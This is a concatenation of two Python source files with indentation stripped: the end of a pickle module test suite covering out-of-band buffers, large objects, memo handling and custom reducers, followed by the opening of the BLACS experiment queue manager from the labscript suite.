(dict.fromkeys, (("a", 1), ("b", 2))),
# built-in static method
(bytearray.maketrans, (b"abc", b"xyz")),
# subclass methods
(Subclass([1,2,2]).count, (2,)),
(Subclass.count, (Subclass([1,2,2]), 2)),
(Subclass.Nested("sweet").count, ("e",)),
(Subclass.Nested.count, (Subclass.Nested("sweet"), "e")),
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method, args in c_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(*args), unpickled(*args))
def test_compat_pickle(self):
tests = [
(range(1, 7), '__builtin__', 'xrange'),
(map(int, '123'), 'itertools', 'imap'),
(functools.reduce, '__builtin__', 'reduce'),
(dbm.whichdb, 'whichdb', 'whichdb'),
(Exception(), 'exceptions', 'Exception'),
(collections.UserDict(), 'UserDict', 'IterableUserDict'),
(collections.UserList(), 'UserList', 'UserList'),
(collections.defaultdict(), 'collections', 'defaultdict'),
]
for val, mod, name in tests:
for proto in range(3):
with self.subTest(type=type(val), proto=proto):
pickled = self.dumps(val, proto)
self.assertIn(('c%s\n%s' % (mod, name)).encode(), pickled)
self.assertIs(type(self.loads(pickled)), type(val))
def test_local_lookup_error(self):
# Test that whichmodule() errors out cleanly when looking up
# an assumed globally-reachable object fails.
def f():
pass
# Since the function is local, lookup will fail
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Same without a __module__ attribute (exercises a different path
# in _pickle.c).
del f.__module__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Yet a different path.
f.__name__ = f.__qualname__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
#
# PEP 574 tests below
#
def buffer_like_objects(self):
# Yield buffer-like objects with the bytestring "abcdef" in them
bytestring = b"abcdefgh"
yield ZeroCopyBytes(bytestring)
yield ZeroCopyBytearray(bytestring)
if _testbuffer is not None:
items = list(bytestring)
value = int.from_bytes(bytestring, byteorder='little')
for flags in (0, _testbuffer.ND_WRITABLE):
# 1-D, contiguous
yield PicklableNDArray(items, format='B', shape=(8,),
flags=flags)
# 2-D, C-contiguous
yield PicklableNDArray(items, format='B', shape=(4, 2),
strides=(2, 1), flags=flags)
# 2-D, Fortran-contiguous
yield PicklableNDArray(items, format='B',
shape=(4, 2), strides=(1, 4),
flags=flags)
def test_in_band_buffers(self):
# Test in-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(obj, proto)
if obj.c_contiguous and proto >= 5:
# The raw memory bytes are serialized in physical order
self.assertIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 0)
if proto >= 5:
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data),
1 if obj.readonly else 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data),
0 if obj.readonly else 1)
# Return a true value from buffer_callback should have
# the same effect
def buffer_callback(obj):
return True
data2 = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertEqual(data2, data)
new = self.loads(data)
# It's a copy
self.assertIsNot(new, obj)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# XXX Unfortunately cannot test non-contiguous array
# (see comment in PicklableNDArray.__reduce_ex__)
def test_oob_buffers(self):
# Test out-of-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
self.dumps(obj, proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = lambda pb: buffers.append(pb.raw())
data = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data), 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data), 0)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 1)
self.assertEqual(count_opcode(pickle.READONLY_BUFFER, data),
1 if obj.readonly else 0)
if obj.c_contiguous:
self.assertEqual(bytes(buffers[0]), b"abcdefgh")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
self.loads(data)
new = self.loads(data, buffers=buffers)
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# Non-sequence buffers accepted too
new = self.loads(data, buffers=iter(buffers))
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_oob_buffers_writable_to_readonly(self):
# Test reconstructing readonly object from writable buffer
obj = ZeroCopyBytes(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(obj, proto, buffer_callback=buffer_callback)
buffers = map(bytearray, buffers)
new = self.loads(data, buffers=buffers)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_picklebuffer_error(self):
# PickleBuffer forbidden with protocol < 5
pb = pickle.PickleBuffer(b"foobar")
for proto in range(0, 5):
with self.assertRaises(pickle.PickleError):
self.dumps(pb, proto)
def test_buffer_callback_error(self):
def buffer_callback(buffers):
1/0
pb = pickle.PickleBuffer(b"foobar")
with self.assertRaises(ZeroDivisionError):
self.dumps(pb, 5, buffer_callback=buffer_callback)
def test_buffers_error(self):
pb = pickle.PickleBuffer(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(pb, proto, buffer_callback=[].append)
# Non iterable buffers
with self.assertRaises(TypeError):
self.loads(data, buffers=object())
# Buffer iterable exhausts too early
with self.assertRaises(pickle.UnpicklingError):
self.loads(data, buffers=[])
@unittest.skipIf(np is None, "Test needs Numpy")
def test_buffers_numpy(self):
def check_no_copy(x, y):
np.testing.assert_equal(x, y)
self.assertEqual(x.ctypes.data, y.ctypes.data)
def check_copy(x, y):
np.testing.assert_equal(x, y)
self.assertNotEqual(x.ctypes.data, y.ctypes.data)
def check_array(arr):
# In-band
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(arr, proto)
new = self.loads(data)
check_copy(arr, new)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffer_callback = lambda _: True
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data)
check_copy(arr, new)
# Out-of-band
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data, buffers=buffers)
if arr.flags.c_contiguous or arr.flags.f_contiguous:
check_no_copy(arr, new)
else:
check_copy(arr, new)
# 1-D
arr = np.arange(6)
check_array(arr)
# 1-D, non-contiguous
check_array(arr[::2])
# 2-D, C-contiguous
arr = np.arange(12).reshape((3, 4))
check_array(arr)
# 2-D, F-contiguous
check_array(arr.T)
# 2-D, non-contiguous
check_array(arr[::2])
class BigmemPickleTests(unittest.TestCase):
# Binary protocols can serialize longs of up to 2 GiB-1
@bigmemtest(size=_2G, memuse=3.6, dry_run=False)
def test_huge_long_32b(self, size):
data = 1 << (8 * size)
try:
for proto in protocols:
if proto < 2:
continue
with self.subTest(proto=proto):
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
finally:
data = None
# Protocol 3 can serialize up to 4 GiB-1 as a bytes object
# (older protocols don't have a dedicated opcode for bytes and are
# too inefficient)
@bigmemtest(size=_2G, memuse=2.5, dry_run=False)
def test_huge_bytes_32b(self, size):
data = b"abcd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES +
struct.pack("<I", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
@bigmemtest(size=_4G, memuse=2.5, dry_run=False)
def test_huge_bytes_64b(self, size):
data = b"acbd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
if proto == 3:
# Protocol 3 does not support large bytes objects.
# Verify that we do not crash when processing one.
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
# All protocols use 1-byte per printable ASCII character; we add another
# byte because the encoded form has to be copied into the internal buffer.
@bigmemtest(size=_2G, memuse=8, dry_run=False)
def test_huge_str_32b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE +
struct.pack("<I", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# BINUNICODE (protocols 1, 2 and 3) cannot carry more than 2**32 - 1 bytes
# of utf-8 encoded unicode. BINUNICODE8 (protocol 4) supports these huge
# unicode strings however.
@bigmemtest(size=_4G, memuse=8, dry_run=False)
def test_huge_str_64b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
if proto < 4:
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# Test classes for reduce_ex
class REX_one(object):
"""No __reduce_ex__ here, but inheriting it from object"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
class REX_two(object):
"""No __reduce__ here, but inheriting it from object"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
"""Calling base class method should succeed"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
class REX_five(object):
"""This one used to fail with infinite recursion"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
class REX_six(object):
"""This class is used to check the 4th argument (list iterator) of
the reduce protocol.
"""
def __init__(self, items=None):
self.items = items if items is not None else []
def __eq__(self, other):
return type(self) is type(other) and self.items == other.items
def append(self, item):
self.items.append(item)
def __reduce__(self):
return type(self), (), None, iter(self.items), None
class REX_seven(object):
"""This class is used to check the 5th argument (dict iterator) of
the reduce protocol.
"""
def __init__(self, table=None):
self.table = table if table is not None else {}
def __eq__(self, other):
return type(self) is type(other) and self.table == other.table
def __setitem__(self, key, value):
self.table[key] = value
def __reduce__(self):
return type(self), (), None, None, iter(self.table.items())
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(int):
def __init__(self, *args, **kwargs):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
def __eq__(self, other):
return int(self) == int(other) and self.__dict__ == other.__dict__
class ComplexNewObj(SimpleNewObj):
def __getnewargs__(self):
return ('%X' % self, 16)
class ComplexNewObjEx(SimpleNewObj):
def __getnewargs_ex__(self):
return ('%X' % self,), {'base': 16}
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests(unittest.TestCase):
def test_dump_closed_file(self):
import os
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
os.remove(TESTFN)
def test_load_closed_file(self):
import os
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
os.remove(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
self.dump(data, stream)
stream.seek(0)
unpickled = self.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 5)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
self.dump(123, f, -1)
self.dump(123, file=f, protocol=-1)
self.dumps(123, -1)
self.dumps(123, protocol=-1)
self.Pickler(f, -1)
self.Pickler(f, protocol=-1)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(self.Pickler):
def __init__(self): pass
class BadUnpickler(self.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def check_dumps_loads_oob_buffers(self, dumps, loads):
# No need to do the full gamut of tests here, just enough to
# check that dumps() and loads() redirect their arguments
# to the underlying Pickler and Unpickler, respectively.
obj = ZeroCopyBytes(b"foo")
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
dumps(obj, protocol=proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = dumps(obj, protocol=proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"foo", data)
self.assertEqual(bytes(buffers[0]), b"foo")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
loads(data)
new = loads(data, buffers=buffers)
self.assertIs(new, obj)
def test_dumps_loads_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dumps() and loads()
self.check_dumps_loads_oob_buffers(self.dumps, self.loads)
def test_dump_load_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dump() and load()
def dumps(obj, **kwargs):
f = io.BytesIO()
self.dump(obj, f, **kwargs)
return f.getvalue()
def loads(data, **kwargs):
f = io.BytesIO(data)
return self.load(f, **kwargs)
self.check_dumps_loads_oob_buffers(dumps, loads)
class AbstractPersistentPicklerTests(unittest.TestCase):
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
elif object == "test_false_value":
self.false_count += 1
return ""
else:
return None
def persistent_load(self, oid):
if not oid:
self.load_false_count += 1
return "test_false_value"
else:
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
L = list(range(10)) + ["test_false_value"]
for proto in protocols:
self.id_count = 0
self.false_count = 0
self.load_false_count = 0
self.load_count = 0
self.assertEqual(self.loads(self.dumps(L, proto)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.false_count, 1)
self.assertEqual(self.load_count, 5)
self.assertEqual(self.load_false_count, 1)
class AbstractIdentityPersistentPicklerTests(unittest.TestCase):
def persistent_id(self, obj):
return obj
def persistent_load(self, pid):
return pid
def _check_return_correct_type(self, obj, proto):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIsInstance(unpickled, type(obj))
self.assertEqual(unpickled, obj)
def test_return_correct_type(self):
for proto in protocols:
# Protocol 0 supports only ASCII strings.
if proto == 0:
self._check_return_correct_type("abc", 0)
else:
for obj in [b"abc\n", "abc\n", -1, -1.1 * 0.1, str]:
self._check_return_correct_type(obj, proto)
def test_protocol0_is_ascii_only(self):
non_ascii_str = "\N{EMPTY SET}"
self.assertRaises(pickle.PicklingError, self.dumps, non_ascii_str, 0)
pickled = pickle.PERSID + non_ascii_str.encode('utf-8') + b'\n.'
self.assertRaises(pickle.UnpicklingError, self.loads, pickled)
class AbstractPicklerUnpicklerObjectTests(unittest.TestCase):
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
for proto in protocols:
f = io.BytesIO()
pickler = self.pickler_class(f, proto)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
def _check_multiple_unpicklings(self, ioclass):
for proto in protocols:
with self.subTest(proto=proto):
data1 = [(x, str(x)) for x in range(2000)] + [b"abcde", len]
f = ioclass()
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data1)
pickled = f.getvalue()
N = 5
f = ioclass(pickled * N)
unpickler = self.unpickler_class(f)
for i in range(N):
if f.seekable():
pos = f.tell()
self.assertEqual(unpickler.load(), data1)
if f.seekable():
self.assertEqual(f.tell(), pos + len(pickled))
self.assertRaises(EOFError, unpickler.load)
def test_multiple_unpicklings_seekable(self):
self._check_multiple_unpicklings(io.BytesIO)
def test_multiple_unpicklings_unseekable(self):
self._check_multiple_unpicklings(UnseekableIO)
def test_unpickling_buffering_readline(self):
# Issue #12687: the unpickler's buffering logic could fail with
# text mode opcodes.
data = list(range(10))
for proto in protocols:
for buf_size in range(1, 11):
f = io.BufferedRandom(io.BytesIO(), buffer_size=buf_size)
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data)
# Tests for dispatch_table attribute
REDUCE_A = 'reduce_A'
class AAA(object):
def __reduce__(self):
return str, (REDUCE_A,)
class BBB(object):
def __init__(self):
# Add an instance attribute to enable state-saving routines at pickling
# time.
self.a = "some attribute"
def __setstate__(self, state):
self.a = "BBB.__setstate__"
def setstate_bbb(obj, state):
"""Custom state setter for BBB objects
Such callable may be created by other persons than the ones who created the
BBB class. If passed as the state_setter item of a custom reducer, this
allows for custom state setting behavior of BBB objects. One can think of
it as the analogous of list_setitems or dict_setitems but for foreign
classes/functions.
"""
obj.a = "custom state_setter"
class AbstractCustomPicklerClass:
"""Pickler implementing a reducing hook using reducer_override."""
def reducer_override(self, obj):
obj_name = getattr(obj, "__name__", None)
if obj_name == 'f':
# asking the pickler to save f as 5
return int, (5, )
if obj_name == 'MyClass':
return str, ('some str',)
elif obj_name == 'g':
# in this case, the callback returns an invalid result (not a 2-5
# tuple or a string), the pickler should raise a proper error.
return False
elif obj_name == 'h':
# Simulate a case when the reducer fails. The error should
# be propagated to the original ``dump`` call.
raise ValueError('The reducer just failed')
return NotImplemented
class AbstractHookTests(unittest.TestCase):
def test_pickler_hook(self):
# test the ability of a custom, user-defined CPickler subclass to
# override the default reducing routines of any type using the method
# reducer_override
def f():
pass
def g():
pass
def h():
pass
class MyClass:
pass
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump([f, MyClass, math.log])
new_f, some_str, math_log = pickle.loads(bio.getvalue())
self.assertEqual(new_f, 5)
self.assertEqual(some_str, 'some str')
# math.log does not have its usual reducer overriden, so the
# custom reduction callback should silently direct the pickler
# to the default pickling by attribute, by returning
# NotImplemented
self.assertIs(math_log, math.log)
with self.assertRaises(pickle.PicklingError):
p.dump(g)
with self.assertRaisesRegex(
ValueError, 'The reducer just failed'):
p.dump(h)
class AbstractDispatchTableTests(unittest.TestCase):
def test_default_dispatch_table(self):
# No dispatch_table attribute by default
f = io.BytesIO()
p = self.pickler_class(f, 0)
with self.assertRaises(AttributeError):
p.dispatch_table
self.assertFalse(hasattr(p, 'dispatch_table'))
def test_class_dispatch_table(self):
# A dispatch_table attribute can be specified class-wide
dt = self.get_dispatch_table()
class MyPickler(self.pickler_class):
dispatch_table = dt
def dumps(obj, protocol=None):
f = io.BytesIO()
p = MyPickler(f, protocol)
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def test_instance_dispatch_table(self):
# A dispatch_table attribute can also be specified instance-wide
dt = self.get_dispatch_table()
def dumps(obj, protocol=None):
f = io.BytesIO()
p = self.pickler_class(f, protocol)
p.dispatch_table = dt
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def _test_dispatch_table(self, dumps, dispatch_table):
def custom_load_dump(obj):
return pickle.loads(dumps(obj, 0))
def default_load_dump(obj):
return pickle.loads(pickle.dumps(obj, 0))
# pickling complex numbers using protocol 0 relies on copyreg
# so check pickling a complex number still works
z = 1 + 2j
self.assertEqual(custom_load_dump(z), z)
self.assertEqual(default_load_dump(z), z)
# modify pickling of complex
REDUCE_1 = 'reduce_1'
def reduce_1(obj):
return str, (REDUCE_1,)
dispatch_table[complex] = reduce_1
self.assertEqual(custom_load_dump(z), REDUCE_1)
self.assertEqual(default_load_dump(z), z)
# check picklability of AAA and BBB
a = AAA()
b = BBB()
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# modify pickling of BBB
dispatch_table[BBB] = reduce_1
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertEqual(custom_load_dump(b), REDUCE_1)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# revert pickling of BBB and modify pickling of AAA
REDUCE_2 = 'reduce_2'
def reduce_2(obj):
return str, (REDUCE_2,)
dispatch_table[AAA] = reduce_2
del dispatch_table[BBB]
self.assertEqual(custom_load_dump(a), REDUCE_2)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# End-to-end testing of save_reduce with the state_setter keyword
# argument. This is a dispatch_table test as the primary goal of
# state_setter is to tweak objects reduction behavior.
# In particular, state_setter is useful when the default __setstate__
# behavior is not flexible enough.
# No custom reducer for b has been registered for now, so
# BBB.__setstate__ should be used at unpickling time
self.assertEqual(default_load_dump(b).a, "BBB.__setstate__")
def reduce_bbb(obj):
return BBB, (), obj.__dict__, None, None, setstate_bbb
dispatch_table[BBB] = reduce_bbb
# The custom reducer reduce_bbb includes a state setter, that should
# have priority over BBB.__setstate__
self.assertEqual(custom_load_dump(b).a, "custom state_setter")
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(pickle.HIGHEST_PROTOCOL+1):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
|
queue.py
|
#####################################################################
# #
# /queue.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
import logging
import os
import platform
import Queue
import threading
import time
import sys
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
import zprocess
import zprocess.locking, labscript_utils.h5_lock, h5py
zprocess.locking.set_client_process_name('BLACS.queuemanager')
from qtutils import *
from labscript_utils.qtwidgets.elide_label import elide_label
# Connection Table Code
from connections import ConnectionTable
from blacs.tab_base_classes import MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL, MODE_BUFFERED
FILEPATH_COLUMN = 0
class QueueTreeview(QTreeView):
def __init__(self,*args,**kwargs):
QTreeView.__init__(self,*args,**kwargs)
self.header().setStretchLastSection(True)
self.setAutoScroll(False)
self.add_to_queue = None
self.delete_selection = None
self._logger = logging.getLogger('BLACS.QueueManager')
def keyPressEvent(self,event):
if event.key() == Qt.Key_Delete:
event.accept()
if self.delete_selection:
self.delete_selection()
QTreeView.keyPressEvent(self,event)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
else:
event.ignore()
def dropEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
for url in event.mimeData().urls():
path = str(url.toLocalFile())
if path.endswith('.h5') or path.endswith('.hdf5'):
self._logger.info('Acceptable file dropped. Path is %s'%path)
if self.add_to_queue:
self.add_to_queue(str(path))
else:
self._logger.info('Dropped file not added to queue because there is no access to the neccessary add_to_queue method')
else:
self._logger.info('Invalid file dropped. Path was %s'%path)
else:
event.ignore()
class QueueManager(object):
REPEAT_ALL = 0
REPEAT_LAST = 1
ICON_REPEAT = ':qtutils/fugue/arrow-repeat'
ICON_REPEAT_LAST = ':qtutils/fugue/arrow-repeat-once'
def __init__(self, BLACS, ui):
self._ui = ui
self.BLACS = BLACS
self.last_opened_shots_folder = BLACS.exp_config.get('paths', 'experiment_shot_storage')
self._manager_running = True
self._manager_paused = False
self._manager_repeat = False
self._manager_repeat_mode = self.REPEAT_ALL
self.master_pseudoclock = self.BLACS.connection_table.master_pseudoclock
self._logger = logging.getLogger('BLACS.QueueManager')
# Create listview model
self._model = QStandardItemModel()
self._create_headers()
self._ui.treeview.setModel(self._model)
self._ui.treeview.add_to_queue = self.process_request
self._ui.treeview.delete_selection = self._delete_selected_items
# set up buttons
self._ui.queue_pause_button.toggled.connect(self._toggle_pause)
self._ui.queue_repeat_button.toggled.connect(self._toggle_repeat)
self._ui.queue_delete_button.clicked.connect(self._delete_selected_items)
self._ui.queue_clear_button.clicked.connect(self._toggle_clear)
self._ui.actionAdd_to_queue.triggered.connect(self.on_add_shots_triggered)
self._ui.queue_add_button.setDefaultAction(self._ui.actionAdd_to_queue)
self._ui.queue_push_up.clicked.connect(self._move_up)
self._ui.queue_push_down.clicked.connect(self._move_down)
self._ui.queue_push_to_top.clicked.connect(self._move_top)
self._ui.queue_push_to_bottom.clicked.connect(self._move_bottom)
# Set the elision of the status labels:
elide_label(self._ui.queue_status, self._ui.queue_status_verticalLayout, Qt.ElideRight)
elide_label(self._ui.running_shot_name, self._ui.queue_status_verticalLayout, Qt.ElideLeft)
# Set up repeat mode button menu:
self.repeat_mode_menu = QMenu(self._ui)
self.action_repeat_all = QAction(QIcon(self.ICON_REPEAT), 'Repeat all', self._ui)
self.action_repeat_last = QAction(QIcon(self.ICON_REPEAT_LAST), 'Repeat last', self._ui)
self.action_repeat_all.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_ALL))
